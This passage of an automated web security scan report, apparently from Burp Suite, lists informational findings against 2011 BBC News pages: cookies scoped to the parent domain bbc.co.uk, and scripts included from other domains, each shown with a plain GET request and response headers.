2.80. http://www.bbc.co.uk/news/world-latin-america-12427057  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427057

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12427057 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=732
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.81. http://www.bbc.co.uk/news/world-latin-america-12436213  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12436213

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12436213 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.82. http://www.bbc.co.uk/news/world-middle-east-12435798  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.83. http://www.bbc.co.uk/news/world-middle-east-12437440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=749
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.84. http://www.bbc.co.uk/news/world-middle-east-12437881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.85. http://www.bbc.co.uk/news/world-middle-east-12437912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.86. http://www.bbc.co.uk/news/world-middle-east-12437922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.87. http://www.bbc.co.uk/news/world-south-asia-12427513  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.88. http://www.bbc.co.uk/news/world-south-asia-12427518  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.89. http://www.bbc.co.uk/news/world-south-asia-12437087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=779
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.90. http://www.bbc.co.uk/news/world-us-canada-12411274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=711
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.91. http://www.bbc.co.uk/news/world-us-canada-12435117  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:26 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:26 GMT
Connection: close
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.92. http://www.bbc.co.uk/news/world-us-canada-12436383  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=741
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.93. http://www.bbc.co.uk/news/world-us-canada-12437116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.94. http://www.bbc.co.uk/news/world-us-canada-12437121  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

3. Cross-domain script include  previous  next
There are 58 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://www.bbc.co.uk/news/business-12434447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.2. http://www.bbc.co.uk/news/business-12434453  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
